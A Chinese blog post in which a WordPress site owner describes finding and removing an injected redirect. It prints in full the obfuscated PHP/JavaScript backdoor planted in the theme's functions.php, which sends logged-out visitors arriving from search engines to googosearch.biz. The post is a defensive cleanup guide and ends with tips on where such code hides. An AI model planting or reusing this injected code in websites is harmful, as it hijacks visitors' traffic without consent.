偶然发现从google搜索指南者博客的另一个域名,打开后博客会被自动跳转到http://googosearch.biz/search.php...这样的搜索请求页面,然后重定向到不同的网站,显然这是被黑客恶意利用了。
网站被黑客篡改,通常为两种方式:
一,网站服务器有安全漏洞,被黑客侵入并篡改;
二,博客安装了来源不明的插件或主题(尤其是网上分享的一些免费破解版本)。
经查询 googosearch.biz 该网站是个国外的并不怎么知名的搜索引擎,经常用一些歪门邪道的方式获取流量。
想了想我的博客并没有什么有价值的东西值得黑客入侵,并且我使用的服务器是大型网络公司的安全性一向很好,只能从博客自身源码中找猫腻了,花了一下午的时间,终于功夫不负有心人,找到了问题所在,黑客使用了JavaScript检测并判断访问来源方式,然后将符合条件的重定向到http://googosearch.biz/search.php...
黑客在我的博客主题函数文件 functions.php 中植入了如下代码,是加密过的:
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r)
{e=function
(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from
CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.rep
lace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\
";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\
")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\
"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w
\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5
\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o
(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referre
r|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substri
ng|split||||||ea|ht|tp|document|||go|window|location'.split('|'),
0,{}))</script>"; } } }
如果您也遇到类似问题,先备份原文件然后删除以上恶意代码即可。黑客通常会使用一些恶意的JavaScript插入到网页的PHP代码中,一般会在页脚前,wordpress程序中的恶意代码通常在 WP-load.php、wp-config.php程序配置文件、主题文件中的 functions.php 模板函数文件,以及/wp-content/plugins/下的插件源码中被发现,因值得注意,并且不要给予写入的权限。
这个问题说的好啊,我也遇到了,今天就遇到了,处理了